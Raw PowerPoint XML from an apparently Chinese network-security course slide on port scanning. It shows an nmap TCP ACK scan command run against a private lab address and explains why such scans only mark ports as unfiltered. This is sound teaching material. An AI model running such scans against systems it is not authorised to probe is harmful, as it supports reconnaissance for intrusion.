                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP ACK协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294630" y="1051878"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用“nmap -sA 192.168.172.129”命令对目标主机进行TCP ACK扫描，如图2-2-43所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5294630" y="1697038"/>
            <a:ext cx="5162550" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649855" y="3192780"/>
            <a:ext cx="9305290" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                                                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-43 TCP ACK扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从扫描结果来看，目标主机1000个端口都没有被过滤，但是却没有端口的状态，说明TCP ACK扫描的准确性很低，它不能确定目标主机端口是否开放了或者开启了防火墙过滤需要使用别的扫描方式进行扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP ACK扫描和TCP SYN扫描类似,使用TCP ACK扫描会向服务器的目标端口发送一个只有 ACK标志的数据包，如果服务器的目标端口是开启的，就会返回一个 TCPRST包。ACK扫描发送数据包只设置ACK标志位。当扫描的系统端口没有被过滤时，开放的端口和关闭的端口都会返回RST包。当nmap将它们标记为unfiltered（未被过滤的),但是却无法准确判断端口是开放还是关闭时,所有不响应的端口和发送特定的ICMP错误消息的服务器端口都会被nmap标记为unfiltered（未被过滤的)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP窗口值判断的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
